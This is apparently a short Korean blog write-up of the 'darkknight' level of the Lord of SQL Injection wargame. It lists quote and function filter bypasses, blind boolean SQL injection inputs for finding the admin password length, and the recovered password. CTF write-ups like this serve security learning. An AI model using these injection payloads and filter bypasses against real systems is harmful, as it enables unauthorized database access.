WarGame/Lord of SQL Injection

[LOS] 12. darkknight

HackingPractice 2020. 8. 8. 12:26

그림 12-1 문제

'(싱글쿼터) 우회 "(더블쿼터), `, hex, binary, char() 사용
ascii() 우회 ord() 사용

?no=0 or true 입력 시 Hello guest 메시지가 출력되는 것을 알 수 있다.

그림 12-2 guest

?no=1 or id like "admin" 입력 시 Hello admin 메시지가 출력되는 것을 알 수 있다.

그림 12-3 admin

?no=1 or length(pw) like 8 입력 시 Hello admin 메시지가 출력되는 것을 알 수 있다.

그림 12-4 true

?no=1 or length(pw) like 9 입력 시 Hello guest가 출력되는 것을 알 수 있다.

그림 12-5 false
그림 12-6 소스코드 

?pw=1c62ba6f라는 것을 알 수 있다.

그림 12-7 정답